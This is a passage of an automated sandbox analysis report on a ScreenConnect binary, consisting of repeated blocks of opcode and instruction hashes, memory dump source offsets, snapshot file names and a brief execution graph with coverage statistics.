                                                                                                                                                                                                  • Opcode Fuzzy Hash: d175bbb6ab596bd7bafe9aacbb27bb04ba5c8215bac32d040147e7473ce130c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF027316483445FC3455778E8545AFB7A6FFC5350704857ED105DB281CF729C098BD1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a447e6aeb0e16a89a6046674c71e6b4304ee579e31f3fd595374b763d48073d7
                                                                                                                                                                                                  • Instruction ID: 2f82a88667454e9e131791e196d275ba6084f875ff68c8ea16b7d4c526798a20
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a447e6aeb0e16a89a6046674c71e6b4304ee579e31f3fd595374b763d48073d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE06D313012289BC719BF69E86872E7BAAEFC92617204165E426C73C8CB30981AC7D5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f663a762bc5afa519c65aa64dd5b4b15fc54b5494f3d31daff6bcdf26f01e2a5
                                                                                                                                                                                                  • Instruction ID: 6378355edb3ffa6fd168034e2220046fc9b44459c019b1ad10a68366ab3b2b8d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f663a762bc5afa519c65aa64dd5b4b15fc54b5494f3d31daff6bcdf26f01e2a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0D471E00219DF8B80DFADC84169EFBF4EF89200B20C06AD918E7210E731AA12CFC0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a8698970a814781b149a9479fd13dfe15b235786df37338ff1db663110ef9dbb
                                                                                                                                                                                                  • Instruction ID: 68fac535caaa356dae9c59a0471d0b8d6e9beb12339e62bb680ea87d5cdf3c64
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8698970a814781b149a9479fd13dfe15b235786df37338ff1db663110ef9dbb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34E0DF323003186B87182A9A74D852FBADBEBC8A71754443EE20AC3344DE718C0A4790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: af8d931f7c228f92b5923e97e18105f15f23d94d2795a28c52ef1a7021e20622
                                                                                                                                                                                                  • Instruction ID: d62fb7d23609f155bdcdb53d73c6a5fa8fa5a1bb94f2fc512a16cff4fd35c5eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: af8d931f7c228f92b5923e97e18105f15f23d94d2795a28c52ef1a7021e20622
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01F0392028EA844FD747A7A188A1A947FA0DB13354B8E40DDC048CF1D7DA4E9403C742
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9be3da8ec62a8c7ac1bde4b0fd1f23764e607485703e76c08d908461bcefbee4
                                                                                                                                                                                                  • Instruction ID: 5c52a74aa6f8425c1d31c112ee4b852f1db6904699586298ffc54b781198df8d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9be3da8ec62a8c7ac1bde4b0fd1f23764e607485703e76c08d908461bcefbee4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58E068729443186BCB09ABDDD8407DEBFF9EF8A320F044069E90CD7280DB3059024694
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12bcdb7f812cf644a4421f73bbe29f2d650e1555406e49d811e7a51a119e278b
                                                                                                                                                                                                  • Instruction ID: 756fd62db167f5496f973404b481b90afc2abd9b447b6fd0f856ede9bdec77a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12bcdb7f812cf644a4421f73bbe29f2d650e1555406e49d811e7a51a119e278b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E0D8313002045783056778E84869FB79AFFC9260344C53ED50ACB344DF729C0547D1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ec43512c6bec5d49abec24930226aaf12f119017ebc9f8ebd92d6b41b121b407
                                                                                                                                                                                                  • Instruction ID: 397aa997c7adfb8cc49c362247fb69113395c19f9b9a46fb22457a170c274ae9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec43512c6bec5d49abec24930226aaf12f119017ebc9f8ebd92d6b41b121b407
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE02632B052058BC344A61AE850967F3AAEBC8724F540438D20CD7355CD729C028790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ceb2814ab98c24c716e283eb6efd1190efbe13f34f28a07d533bb8c69106f769
                                                                                                                                                                                                  • Instruction ID: 9bceb2db64a46332447950bd741d851c574bb3cec4e0850c5ba999b96f114093
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb2814ab98c24c716e283eb6efd1190efbe13f34f28a07d533bb8c69106f769
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE0E6353011185787087B7DE46857F7B9AEFD95613244125E52AC7388DF709C0AC7D5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:11.3%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:5
                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                  execution_graph 14412 7ff887cd8014 14414 7ff887cd801d 14412->14414 14413 7ff887cd8082 14414->14413 14415 7ff887cd80f6 SetProcessMitigationPolicy 14414->14415 14416 7ff887cd8152 14415->14416
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B$6B$6B
                                                                                                                                                                                                  • API String ID: 0-1796150382
                                                                                                                                                                                                  • Opcode ID: 66cdfe89d82a45066805691318c3cfc89a66b25f055177027f3927839a08c8cb
                                                                                                                                                                                                  • Instruction ID: dad228bd0b6616cb788a048d6e4d05a03d2bc2bebbcfcb5f1580f7ab554486a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66cdfe89d82a45066805691318c3cfc89a66b25f055177027f3927839a08c8cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A20572E9CA4A4FE7A9EA2994556BD37E2FF95380F544079C44DCB2C3DE28B805C342

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: a94aab1fd61e24fad41038914601c7d82617ff87c728051f1db5ada70f523eed
                                                                                                                                                                                                  • Instruction ID: 17ee016f383b956824703ce718bcd9ae5059a9d00ebb1714bdc0fac248c10977
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a94aab1fd61e24fad41038914601c7d82617ff87c728051f1db5ada70f523eed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91124672A8CA4A4FE799E62D94516BD37E1FF95390F2800BAD05DCF2D3DD28A846C340
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: d20ec13e26212acdc01c7ff2b5f1bffb7b6118e484f56ef8c8d4b39c8c39e3e3
                                                                                                                                                                                                  • Instruction ID: eaf769a0be85a89bdd92afb27959e81aa21b9abf790a1a61911a2274a56c8c03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20ec13e26212acdc01c7ff2b5f1bffb7b6118e484f56ef8c8d4b39c8c39e3e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4120432E98A4B4BEBA9DA2984516BD37E2FF95784F544079C41DCB2C7DE2CB805C342
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9ade17e62efc2121bc516542c979139dcc3d27a6feed6dd7c229185748e2d473
                                                                                                                                                                                                  • Instruction ID: 9b728685ba454c55178008ea667fb1878670c150ebfef6255b9b8c7e1763b086
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ade17e62efc2121bc516542c979139dcc3d27a6feed6dd7c229185748e2d473
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E1E632E98A4B4BE7A9E72984516BD77F2FF96380F540479D04DCB2C2DE28B846C341

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2606398556.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887cd0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                  • Opcode ID: b5e7bae6fb7aa9685fb5391d45bd16ba1088eed49284e24226f5a18aab6cbb6c
                                                                                                                                                                                                  • Instruction ID: 5d3583626a26b599f70ed5b32494303393814f1cadafc39ba9ec75ae689f0322
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5e7bae6fb7aa9685fb5391d45bd16ba1088eed49284e24226f5a18aab6cbb6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF412631D0CB498FDB25ABA8D84A5F97BF1EF55350F04017EE449C3192DF68A846C791
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: c2b6c33bb1a09c699f30d83def6d5a14eb894b7182763c99f7c44c2ba5233979
                                                                                                                                                                                                  • Instruction ID: e6a303afbae3c5c958c06962947fe8614e3fe97c0cbefb0a50db56f45d2784db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b6c33bb1a09c699f30d83def6d5a14eb894b7182763c99f7c44c2ba5233979
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 278135B2D9CA4B4AEBA9DA2944616BC37E1FF55B80F08407DC45DCF187DE2CB805C242
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 12100005343998cd4a1981e6dca14fe715098d7d8284a9f31f5eeb6f5491ed45
                                                                                                                                                                                                  • Instruction ID: e7d115a61264bfa7b54468ab169578b0f60303aa258069be2c3b20ee67d0fa21
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12100005343998cd4a1981e6dca14fe715098d7d8284a9f31f5eeb6f5491ed45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA31E457E4E6D31EF252956E19950FD2FA0EFA21A0B1C00B7D0A8CF0D3ED0918478361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 6d3e88c51ea7ea93d7f94ae13d8a3212e313dd26a9b0e33efdc4797a51e5b3bd
                                                                                                                                                                                                  • Instruction ID: 85356555e4a685a0cd1a6e023834647cf3b940495507972c78cc89282e34a8dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d3e88c51ea7ea93d7f94ae13d8a3212e313dd26a9b0e33efdc4797a51e5b3bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8331D557E4E6D26AE352956E6D950FD2FA0EFA21A1B1C00B7D0A8CF0D3E909584B8361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 3af88387504a749ed98bd0491a5536cbaa90e0ac7be18aa1648aabc7fbe2735b
                                                                                                                                                                                                  • Instruction ID: 09d89cd5d48900a8e641a12c0bbd4f17a485c26c7aea780a5de66d9e1f914064
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3af88387504a749ed98bd0491a5536cbaa90e0ac7be18aa1648aabc7fbe2735b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8721B157E4E6D36EF252956E19950FD2FA1EFA22A0B1C00B7D0A8CF0D3ED0918478361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: a454dedd6af25cba521cba28a1b8708c33c517139bed1a305a1fa860423c46b0
                                                                                                                                                                                                  • Instruction ID: add3514e21da0bc0937ba6871ab228f90c8cc548bfe399c61ec257223967d6a1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a454dedd6af25cba521cba28a1b8708c33c517139bed1a305a1fa860423c46b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9421D657E4E6D25EF256957E2D954FD2FA1EFA26A0B1C01B7D098CF0D3EC08184B8361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3ff21b2b4c9e4085d1b7dd4875253c8e950b4cf0be153660fa4020c830edc0df
                                                                                                                                                                                                  • Instruction ID: 995d4a9109910f700ba462fec38f87a1c81f39d90347c40cf2198e939feece8e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff21b2b4c9e4085d1b7dd4875253c8e950b4cf0be153660fa4020c830edc0df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA21263394D6564FE742EA6EE8910ED7BB0FF5136871800B7E0C8CF0A3EA156447D681
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3ae955a06911b7dc4abceaf36af8be05b8f56556987dce2998e72e261e90665b
                                                                                                                                                                                                  • Instruction ID: f92899ec7b381a5c053f219f8219f14434cd796d314f79d46d412bbbba946d4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ae955a06911b7dc4abceaf36af8be05b8f56556987dce2998e72e261e90665b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F21BD3658E2956FC3069BA8D8659D93FB0EF8726470901F7D089CB0B3CA1D588AC7A1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cf43b4ddbc6db47a07d6fc2812d1b7e0137ca663819362ae4fcec46ca1db6cf3
                                                                                                                                                                                                  • Instruction ID: 31028d47830e487c63a414a6fbf9cd76cc70c0b51bc2778edb2052fce9a4bcc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf43b4ddbc6db47a07d6fc2812d1b7e0137ca663819362ae4fcec46ca1db6cf3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3213A3294DF894FD7A5EB7598541A97BF1FF85360B4802BAD08DCB192DB2CA802C742
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f46e7d0065a9fa047a557401b47e8a109462a7e53bc59fdad04cf4322497d411
                                                                                                                                                                                                  • Instruction ID: 70393d8092f1d6f659ad440557d661fcdf2a4b787ec102e7209c1f25b61db2e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f46e7d0065a9fa047a557401b47e8a109462a7e53bc59fdad04cf4322497d411
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511C431608D084FE794EA28E868B7AB3E1FF98355F18057ED84DC72A1DF659C40C741
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 82b71253a63e31140d85d76378279594b97e30dc060aaffedf096a6865df7097
                                                                                                                                                                                                  • Instruction ID: 81ef24c12df54f988a9695e7104ce77663fa12fb1c4ac894d0bff75fba4e0ea1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82b71253a63e31140d85d76378279594b97e30dc060aaffedf096a6865df7097
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9611E733F8CD498AFB89A7692C601FC3AE2FF48784F8400BAD41DC75D2CE149A00C245
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7a2237cc11c089e524de379d6380f2b009a467e7680422e40bae49e4158f3983
                                                                                                                                                                                                  • Instruction ID: e566d2781c887594d02d6554152a8950d76874b3b629ae7182752337fe0fe104
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2237cc11c089e524de379d6380f2b009a467e7680422e40bae49e4158f3983
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11D3B6D4CA889FEB95DB755C651AC3FF1FF59300F0540AAD458CB296DA249901C702
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1bb55f5c7e084763c47a7ad338f61ba3e592936e79f175fb6117d77e4a18fe6c
                                                                                                                                                                                                  • Instruction ID: 37146ff5bbd4f61df9a342894fbfb7ae68ddf2c65993a16f02edf127da98917a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bb55f5c7e084763c47a7ad338f61ba3e592936e79f175fb6117d77e4a18fe6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70115E72A48A4A8FDA98EF19C451B6977E1FF54744B1440A9C44DCF286DE28E885CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6d8c0b649f99f4019eb5f2cc18ffd20259882a39bb133fadd3210ad470150a45
                                                                                                                                                                                                  • Instruction ID: cac80952727bb2c1b3d92b1620cdad663ab10f5a4a51f19d51ca376527b53f95
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8c0b649f99f4019eb5f2cc18ffd20259882a39bb133fadd3210ad470150a45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0711061698DA574BF769922A84643796AF2FF85380F1940BFD449CA1D3DD2C9C81C341
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
